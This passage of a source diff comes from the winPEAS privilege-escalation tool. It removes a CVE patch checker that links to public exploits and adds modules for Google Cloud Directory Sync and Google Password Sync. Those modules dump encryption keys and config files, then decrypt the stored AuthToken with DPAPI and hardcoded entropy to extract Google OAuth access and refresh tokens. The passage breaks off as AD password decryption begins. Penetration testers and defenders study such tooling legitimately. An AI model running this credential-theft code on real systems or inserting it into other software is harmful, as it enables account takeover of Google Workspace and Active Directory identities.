4537764, 4537806, 4540670, 4541329, 4550929,
|
||||
4550947, 4556813, 4561616, 4567517, 4565511,
|
||||
4571694, 4577015
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537789, 4537816, 4540681, 4541330, 4554342,
|
||||
4550927, 4556812, 4561602, 4567515, 4565508,
|
||||
4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537762, 4537795, 4540689, 4541333, 4554349,
|
||||
4550922, 4550944, 4556807, 4561621, 4567514,
|
||||
4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4532691, 4537818, 4538461, 4541331, 4554354,
|
||||
4549949, 4550969, 4551853, 4561608, 4567513,
|
||||
4558998, 4559003, 4565349, 4571748, 4570333,
|
||||
4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4532693, 4535996, 4540673, 4541335, 4551762,
|
||||
4554364, 4549951, 4550945, 4556799, 4560960,
|
||||
4567512, 4565483, 4559004, 4565351, 4566116,
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18363:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4532693, 4535996, 4540673, 4541335, 4551762,
|
||||
4554364, 4549951, 4550945, 4556799, 4560960,
|
||||
4567512, 4565483, 4559004, 4565351, 4566116,
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,98 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2020_0683
|
||||
{
|
||||
private const string name = "CVE-2020-0683";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537776, 4540693, 4550930, 4556826, 4561649,
|
||||
4567518, 4565513, 4571692, 4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537764, 4537806, 4540670, 4541329, 4550929,
|
||||
4550947, 4556813, 4561616, 4567517, 4565511,
|
||||
4571694, 4577015
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537789, 4537816, 4540681, 4541330, 4554342,
|
||||
4550927, 4556812, 4561602, 4567515, 4565508,
|
||||
4571741, 4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4537762, 4537795, 4540689, 4541333, 4554349,
|
||||
4550922, 4550944, 4556807, 4561621, 4567514,
|
||||
4565489, 4571709, 4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4532691, 4537818, 4538461, 4541331, 4554354,
|
||||
4549949, 4550969, 4551853, 4561608, 4567513,
|
||||
4558998, 4559003, 4565349, 4571748, 4570333,
|
||||
4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4532693, 4535996, 4540673, 4541335, 4551762,
|
||||
4554364, 4549951, 4550945, 4556799, 4560960,
|
||||
4567512, 4565483, 4559004, 4565351, 4566116,
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18363:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4532693, 4535996, 4540673, 4541335, 4551762,
|
||||
4554364, 4549951, 4550945, 4556799, 4560960,
|
||||
4567512, 4565483, 4559004, 4565351, 4566116,
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,35 +0,0 @@
|
||||
using System.Linq;
|
||||
using System.Collections.Generic;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2020_0796
|
||||
{
|
||||
private const string name = "CVE-2020-0796";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 18362:
|
||||
case 18363:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4551762
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,90 +0,0 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson.Msrc
|
||||
{
|
||||
internal static class CVE_2020_1013
|
||||
{
|
||||
private const string name = "CVE-2020-1013";
|
||||
|
||||
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
|
||||
{
|
||||
var supersedence = new List<int>();
|
||||
|
||||
switch (buildNumber)
|
||||
{
|
||||
case 10240:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4577049
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 14393:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4577015
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 16299:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4577041
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17134:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4577032
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 17763:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4570333, 4577069
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18362:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 18363:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4574727, 4577062
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
case 19041:
|
||||
|
||||
supersedence.AddRange(new int[] {
|
||||
4571756, 4577063
|
||||
});
|
||||
|
||||
break;
|
||||
|
||||
default:
|
||||
return;
|
||||
}
|
||||
|
||||
if (!supersedence.Intersect(installedKBs).Any())
|
||||
{
|
||||
vulnerabilities.SetAsVulnerable(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,18 +0,0 @@
|
||||
namespace winPEAS._3rdParty.Watson
|
||||
{
|
||||
public class Vulnerability
|
||||
{
|
||||
public string Identification { get; }
|
||||
public string[] KnownExploits { get; }
|
||||
public bool Vulnerable { get; private set; }
|
||||
|
||||
public Vulnerability(string id, string[] exploits)
|
||||
{
|
||||
Identification = id;
|
||||
KnownExploits = exploits;
|
||||
}
|
||||
|
||||
public void SetAsVulnerable()
|
||||
=> Vulnerable = true;
|
||||
}
|
||||
}
|
||||
@@ -1,111 +0,0 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using winPEAS.Helpers;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson
|
||||
{
|
||||
public class VulnerabilityCollection
|
||||
{
|
||||
private readonly List<Vulnerability> _vulnerabilities;
|
||||
|
||||
public void SetAsVulnerable(string id)
|
||||
=> _vulnerabilities.First(e => e.Identification == id).SetAsVulnerable();
|
||||
|
||||
public VulnerabilityCollection()
|
||||
{
|
||||
_vulnerabilities = Populate();
|
||||
}
|
||||
|
||||
public void ShowResults()
|
||||
{
|
||||
foreach (Vulnerability vuln in _vulnerabilities.Where(i => i.Vulnerable))
|
||||
{
|
||||
Beaprint.BadPrint($" [!] {vuln.Identification} : VULNERABLE");
|
||||
|
||||
foreach (string exploit in vuln.KnownExploits)
|
||||
{
|
||||
Beaprint.BadPrint($" [>] {exploit}");
|
||||
}
|
||||
|
||||
Console.WriteLine();
|
||||
}
|
||||
|
||||
if (_vulnerabilities.Any(e => e.Vulnerable))
|
||||
{
|
||||
Beaprint.BadPrint($" [*] Finished. Found {_vulnerabilities.Count(i => i.Vulnerable)} potential vulnerabilities.\r\n");
|
||||
}
|
||||
else
|
||||
{
|
||||
Beaprint.GoodPrint(" [*] Finished. Found 0 vulnerabilities.\r\n");
|
||||
}
|
||||
}
|
||||
|
||||
private List<Vulnerability> Populate()
|
||||
{
|
||||
return new List<Vulnerability>()
|
||||
{
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-0836",
|
||||
exploits: new string[] { "https://exploit-db.com/exploits/46718", "https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-0841",
|
||||
exploits: new string[] { "https://github.com/rogue-kdc/CVE-2019-0841", "https://rastamouse.me/tags/cve-2019-0841/" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1064",
|
||||
exploits: new string[] { "https://www.rythmstick.net/posts/cve-2019-1064/" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1130",
|
||||
exploits: new string[] { "https://github.com/S3cur3Th1sSh1t/SharpByeBear" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1253",
|
||||
exploits: new string[] { "https://github.com/padovah4ck/CVE-2019-1253", "https://github.com/sgabe/CVE-2019-1253" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1315",
|
||||
exploits: new string[] { "https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1385",
|
||||
exploits: new string[] { "https://www.youtube.com/watch?v=K6gHnr-VkAg" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1388",
|
||||
exploits: new string[] { "https://github.com/jas502n/CVE-2019-1388" }
|
||||
),
|
||||
|
||||
new Vulnerability(
|
||||
id: "CVE-2019-1405",
|
||||
exploits: new string[] { "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", "https://github.com/apt69/COMahawk" }
|
||||
),
|
||||
new Vulnerability(
|
||||
id: "CVE-2020-0668",
|
||||
exploits: new string[] { "https://github.com/itm4n/SysTracingPoc" }
|
||||
),
|
||||
new Vulnerability(
|
||||
id: "CVE-2020-0683",
|
||||
exploits: new string[] { "https://github.com/padovah4ck/CVE-2020-0683", "https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1" }
|
||||
),
|
||||
new Vulnerability(
|
||||
id: "CVE-2020-1013",
|
||||
exploits: new string[] { "https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/" }
|
||||
),
|
||||
new Vulnerability(
|
||||
id: "CVE-2020-0796",
|
||||
exploits: new string[] { "https://github.com/danigargu/CVE-2020-0796 (smbghost)" }
|
||||
)
|
||||
};
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,80 +0,0 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS._3rdParty.Watson.Msrc;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson
|
||||
{
|
||||
|
||||
//////////////////////////////
|
||||
////// MAIN WATSON CLASS /////
|
||||
//////////////////////////////
|
||||
class Watson
|
||||
{
|
||||
public static void FindVulns()
|
||||
{
|
||||
Console.WriteLine(Beaprint.YELLOW + " [?] " + Beaprint.LBLUE + "Windows vulns search powered by " + Beaprint.LRED + "Watson" + Beaprint.LBLUE + "(https://github.com/rasta-mouse/Watson)" + Beaprint.NOCOLOR);
|
||||
|
||||
// Supported versions
|
||||
var supportedVersions = new Dictionary<int, string>()
|
||||
{
|
||||
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
|
||||
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
|
||||
{ 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
|
||||
};
|
||||
|
||||
// Get OS Build number
|
||||
var buildNumber = Wmi.GetBuildNumber();
|
||||
if (buildNumber != 0)
|
||||
{
|
||||
if (!supportedVersions.ContainsKey(buildNumber))
|
||||
{
|
||||
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
|
||||
}
|
||||
|
||||
var version = supportedVersions[buildNumber];
|
||||
Console.WriteLine(" [*] OS Version: {0} ({1})", version, buildNumber);
|
||||
}
|
||||
else
|
||||
{
|
||||
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
|
||||
}
|
||||
|
||||
// List of KBs installed
|
||||
Console.WriteLine(" [*] Enumerating installed KBs...");
|
||||
var installedKBs = Wmi.GetInstalledKBs();
|
||||
|
||||
#if DEBUG
|
||||
Console.WriteLine();
|
||||
|
||||
foreach (var kb in installedKBs)
|
||||
{
|
||||
Console.WriteLine(" {0}", kb);
|
||||
}
|
||||
|
||||
Console.WriteLine();
|
||||
#endif
|
||||
|
||||
// List of Vulnerabilities
|
||||
var vulnerabilities = new VulnerabilityCollection();
|
||||
|
||||
// Check each one
|
||||
CVE_2019_0836.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_0841.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1064.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1130.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1253.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1315.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1385.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1388.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2019_1405.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2020_0668.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2020_0683.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2020_1013.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
CVE_2020_0796.Check(vulnerabilities, buildNumber, installedKBs);
|
||||
|
||||
// Print the results
|
||||
vulnerabilities.ShowResults();
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,65 +0,0 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Management;
|
||||
|
||||
namespace winPEAS._3rdParty.Watson
|
||||
{
|
||||
public class Wmi
|
||||
{
|
||||
public static List<int> GetInstalledKBs()
|
||||
{
|
||||
var KbList = new List<int>();
|
||||
|
||||
try
|
||||
{
|
||||
using (var searcher = new ManagementObjectSearcher(@"root\cimv2", "SELECT HotFixID FROM Win32_QuickFixEngineering"))
|
||||
{
|
||||
using (var hotFixes = searcher.Get())
|
||||
{
|
||||
foreach (var hotFix in hotFixes)
|
||||
{
|
||||
var line = hotFix["HotFixID"].ToString().Remove(0, 2);
|
||||
|
||||
if (int.TryParse(line, out int kb))
|
||||
{
|
||||
KbList.Add(kb);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (ManagementException e)
|
||||
{
|
||||
Console.Error.WriteLine(" [!] {0}", e.Message);
|
||||
}
|
||||
|
||||
return KbList;
|
||||
}
|
||||
|
||||
public static int GetBuildNumber()
|
||||
{
|
||||
try
|
||||
{
|
||||
using (var searcher = new ManagementObjectSearcher(@"root\cimv2", "SELECT BuildNumber FROM Win32_OperatingSystem"))
|
||||
{
|
||||
using (var collection = searcher.Get())
|
||||
{
|
||||
foreach (var num in collection)
|
||||
{
|
||||
if (int.TryParse(num["BuildNumber"] as string, out int buildNumber))
|
||||
{
|
||||
return buildNumber;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (ManagementException e)
|
||||
{
|
||||
Console.Error.WriteLine(" [!] {0}", e.Message);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -15,7 +15,9 @@ namespace winPEAS.Checks
|
||||
new AWSInfo(),
|
||||
new AzureInfo(),
|
||||
new GCPInfo(),
|
||||
new GCPJoinedInfo()
|
||||
new GCPJoinedInfo(),
|
||||
new GCDSInfo(),
|
||||
new GPSInfo(),
|
||||
};
|
||||
|
||||
foreach (var cloudInfo in cloudInfoList)
|
||||
|
||||
@@ -5,7 +5,6 @@ using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS._3rdParty.Watson;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.AppLocker;
|
||||
using winPEAS.Helpers.Extensions;
|
||||
@@ -108,10 +107,6 @@ namespace winPEAS.Checks
|
||||
};
|
||||
Beaprint.DictPrint(basicDictSystem, colorsSI, false);
|
||||
Console.WriteLine();
|
||||
Watson.FindVulns();
|
||||
|
||||
//To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
|
||||
//Usually you won't need to do anything with the classes Wmi, Vulnerability and VulnerabilityCollection
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
|
||||
139
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCDSInfo.cs
Normal file
139
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCDSInfo.cs
Normal file
@@ -0,0 +1,139 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Security.Cryptography;
|
||||
using System.Text;
|
||||
using winPEAS.Helpers;
|
||||
using System.Data.SQLite;
|
||||
using Org.BouncyCastle.Crypto;
|
||||
using Org.BouncyCastle.Crypto.Parameters;
|
||||
using Org.BouncyCastle.Crypto.Modes;
|
||||
using System.Linq;
|
||||
using Microsoft.Win32;
|
||||
using System.Web.Script.Serialization;
|
||||
|
||||
|
||||
namespace winPEAS.Info.CloudInfo
|
||||
{
|
||||
internal class GCDSInfo : CloudInfoBase
|
||||
{
|
||||
public override string Name => "Google Cloud Directory Sync";
|
||||
|
||||
public override bool IsCloud => CheckIfGCDSInstalled();
|
||||
|
||||
private Dictionary<string, List<EndpointData>> _endpointData = null;
|
||||
|
||||
public static bool CheckIfGCDSInstalled()
|
||||
{
|
||||
string[] check = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKCU", @"SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util");
|
||||
bool regExists = check != null && check.Length > 0;
|
||||
bool result = regExists || File.Exists(@"C:\Program Files\Google Cloud Directory Sync\config-manager.exe");
|
||||
return result;
|
||||
}
|
||||
|
||||
private List<EndpointData> GetGCDSRegValues()
|
||||
{
|
||||
Dictionary<string, string> GCDSRegValues = new Dictionary<string, string>();
|
||||
GCDSRegValues.Add("V2.configured", Helpers.Registry.RegistryHelper.GetRegValue("HKCU", @"SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util", @"/Encryption/Policy/V2.configured"));
|
||||
GCDSRegValues.Add("V2.iv", Helpers.Registry.RegistryHelper.GetRegValue("HKCU", @"SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util", @"/Encryption/Policy/V2.iv").Replace("/", "").Replace("\\","/"));
|
||||
GCDSRegValues.Add("V2.key", Helpers.Registry.RegistryHelper.GetRegValue("HKCU", @"SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util", @"/Encryption/Policy/V2.key").Replace("/", "").Replace("\\", "/"));
|
||||
string openRecent = Helpers.Registry.RegistryHelper.GetRegValue("HKCU", @"SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui", @"open.recent");
|
||||
GCDSRegValues.Add("Open recent confs", Helpers.Registry.RegistryHelper.GetRegValue("HKCU", @"SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui", @"open.recent"));
|
||||
|
||||
List<string> filePaths = new List<string>(openRecent.Split(new string[] { "/u000a" }, StringSplitOptions.None));
|
||||
|
||||
foreach (var filePath in filePaths)
|
||||
{
|
||||
// Normalize the path by replacing triple slashes and double slashes with single slashes
|
||||
string normalizedPath = filePath.Replace("///", "/").Replace("//", "/");
|
||||
|
||||
// Remove any leading slashes that shouldn't be there
|
||||
if (normalizedPath.StartsWith("/"))
|
||||
{
|
||||
normalizedPath = normalizedPath.Substring(1);
|
||||
}
|
||||
|
||||
// Check if file exists
|
||||
if (File.Exists(normalizedPath))
|
||||
{
|
||||
try
|
||||
{
|
||||
// Read and print the file content
|
||||
string fileContent = File.ReadAllText(normalizedPath);
|
||||
List<EndpointData> _endpointDataList_cust = new List<EndpointData>();
|
||||
_endpointDataList_cust.Add(new EndpointData()
|
||||
{
|
||||
EndpointName = @"Content",
|
||||
Data = fileContent,
|
||||
IsAttackVector = false
|
||||
});
|
||||
_endpointData.Add(normalizedPath, _endpointDataList_cust);
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.PrintException($"Could not open file {normalizedPath}: {ex.Message}");
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
Beaprint.PrintException($"File {normalizedPath} does not exist.");
|
||||
}
|
||||
}
|
||||
|
||||
// Format the info in expected CloudInfo format
|
||||
List<EndpointData> _endpointDataList = new List<EndpointData>();
|
||||
|
||||
foreach (var kvp in GCDSRegValues)
|
||||
{
|
||||
_endpointDataList.Add(new EndpointData()
|
||||
{
|
||||
EndpointName = kvp.Key,
|
||||
Data = kvp.Value?.Trim(),
|
||||
IsAttackVector = false
|
||||
});
|
||||
}
|
||||
|
||||
return _endpointDataList;
|
||||
}
|
||||
|
||||
|
||||
public override Dictionary<string, List<EndpointData>> EndpointDataList()
|
||||
{
|
||||
if (_endpointData == null)
|
||||
{
|
||||
_endpointData = new Dictionary<string, List<EndpointData>>();
|
||||
|
||||
try
|
||||
{
|
||||
if (IsAvailable)
|
||||
{
|
||||
_endpointData.Add("Local Info", GetGCDSRegValues());
|
||||
}
|
||||
else
|
||||
{
|
||||
_endpointData.Add("General Info", new List<EndpointData>()
|
||||
{
|
||||
new EndpointData()
|
||||
{
|
||||
EndpointName = "",
|
||||
Data = null,
|
||||
IsAttackVector = false
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.PrintException(ex.Message);
|
||||
}
|
||||
}
|
||||
|
||||
return _endpointData;
|
||||
}
|
||||
|
||||
public override bool TestConnection()
|
||||
{
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
304
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GPSInfo.cs
Normal file
304
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GPSInfo.cs
Normal file
@@ -0,0 +1,304 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Security.Cryptography;
|
||||
using System.Text;
|
||||
using winPEAS.Helpers;
|
||||
using System.Data.SQLite;
|
||||
using Org.BouncyCastle.Crypto;
|
||||
using Org.BouncyCastle.Crypto.Parameters;
|
||||
using Org.BouncyCastle.Crypto.Modes;
|
||||
using System.Linq;
|
||||
using Microsoft.Win32;
|
||||
using System.Web.Script.Serialization;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
|
||||
namespace winPEAS.Info.CloudInfo
|
||||
{
|
||||
internal class GPSInfo : CloudInfoBase
|
||||
{
|
||||
public override string Name => "Google Password Sync";
|
||||
|
||||
public override bool IsCloud => CheckIfGPSInstalled();
|
||||
|
||||
private Dictionary<string, List<EndpointData>> _endpointData = null;
|
||||
|
||||
public static bool CheckIfGPSInstalled()
|
||||
{
|
||||
string[] check = Helpers.Registry.RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Google\Google Apps Password Sync");
|
||||
bool regExists = check != null && check.Length > 0;
|
||||
bool result = regExists || File.Exists(@"C:\Program Files\Google\Password Sync\PasswordSync.exe") || File.Exists(@"C:\Program Files\Google\Password Sync\password_sync_service.exe");
|
||||
return result;
|
||||
}
|
||||
|
||||
private List<EndpointData> GetGPSValues()
|
||||
{
|
||||
Dictionary<string, string> GPSRegValues = new Dictionary<string, string>();
|
||||
|
||||
// Check config file
|
||||
string path_config = @"C:\ProgramData\Google\Google Apps Password Sync\config.xml";
|
||||
if (File.Exists(path_config))
|
||||
{
|
||||
try
|
||||
{
|
||||
// Load the XML file
|
||||
string xmlContent = File.ReadAllText(path_config);
|
||||
|
||||
// Extract values using Regex
|
||||
string baseDN = ExtractValue(xmlContent, @"<baseDN>(.*?)<\/baseDN>");
|
||||
string authorizedUsername = ExtractValue(xmlContent, @"<authorizedUsername>(.*?)<\/authorizedUsername>");
|
||||
string anonymousAccess = ExtractValue(xmlContent, @"<useAnonymousAccess value=""(.*?)"" ");
|
||||
|
||||
// Output the extracted values
|
||||
GPSRegValues.Add("BaseDN", baseDN);
|
||||
GPSRegValues.Add("AnonymousAccess", anonymousAccess);
|
||||
GPSRegValues.Add("authorizedUsername", authorizedUsername);
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.PrintException("Error accessing the Google Password Sync configuration from 'C:\\ProgramData\\Google\\Google Apps Password Sync\\config.xml'");
|
||||
Beaprint.PrintException("Exception: " + ex.Message);
|
||||
}
|
||||
}
|
||||
|
||||
// Get registry valus and decrypt them
|
||||
string hive = "HKLM";
|
||||
string regAddr = @"SOFTWARE\Google\Google Apps Password Sync";
|
||||
string[] subkeys = Helpers.Registry.RegistryHelper.GetRegSubkeys(hive, regAddr);
|
||||
if (subkeys == null || subkeys.Length == 0)
|
||||
{
|
||||
Beaprint.PrintException("Winpeas need admin privs to check the registry for credentials");
|
||||
}
|
||||
else
|
||||
{
|
||||
GPSRegValues.Add("Email", Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"Email"));
|
||||
|
||||
// Check if AuthToken in the registry
|
||||
string authtokenInReg = Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"AuthToken");
|
||||
if (authtokenInReg.Length > 0)
|
||||
{
|
||||
try
|
||||
{
|
||||
Native.Advapi32 advapi = new Native.Advapi32();
|
||||
byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };
|
||||
|
||||
// Decrypt auth token
|
||||
byte[] encryptedEncodedAuthToken = advapi.ReadRegistryValue(regAddr, @"AuthToken");
|
||||
byte[] decryptedData = DecryptData(encryptedEncodedAuthToken, entropyBytes);
|
||||
string base32hexEncodedString = Encoding.Unicode.GetString(decryptedData).TrimEnd('\0');
|
||||
|
||||
// Decode decrypted auth token
|
||||
byte[] originalData = Base32HexDecoder.Decode(base32hexEncodedString);
|
||||
string plainAuthToken = Encoding.Unicode.GetString(originalData).TrimEnd('\0');
|
||||
|
||||
// Find tokens via regexes
|
||||
string accessTokenRegex = @"ya29\.[a-zA-Z0-9_\-]{50,}";
|
||||
string refreshTokenRegex = @"1//[a-zA-Z0-9_\-]{50,}";
|
||||
|
||||
MatchCollection accesTokens = Regex.Matches(plainAuthToken, accessTokenRegex);
|
||||
MatchCollection refreshTokens = Regex.Matches(plainAuthToken, refreshTokenRegex);
|
||||
|
||||
if (refreshTokens.Count > 0)
|
||||
{
|
||||
GPSRegValues.Add("Decrypted refresh token", refreshTokens[0].Value);
|
||||
}
|
||||
|
||||
if (accesTokens.Count > 0)
|
||||
{
|
||||
GPSRegValues.Add("Decrypted access token", accesTokens[0].Value);
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.PrintException("Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr + " (key: AuthToken)\nError was: " + ex.Message);
|
||||
GPSRegValues.Add("authToken (error)", "Error trying to decrypt and decode the AuthToken. You will need to check it yourself. It's in " + hive + "\\" + regAddr);
|
||||
}
|
||||
}
|
||||
|
||||
string adpasswordInReg = Helpers.Registry.RegistryHelper.GetRegValue(hive, regAddr, @"ADPassword");
|
||||
if (adpasswordInReg.Length > 0)
|
||||
{
|
||||
try
|
||||
{
|
||||
Native.Advapi32 advapi = new Native.Advapi32();
|
||||
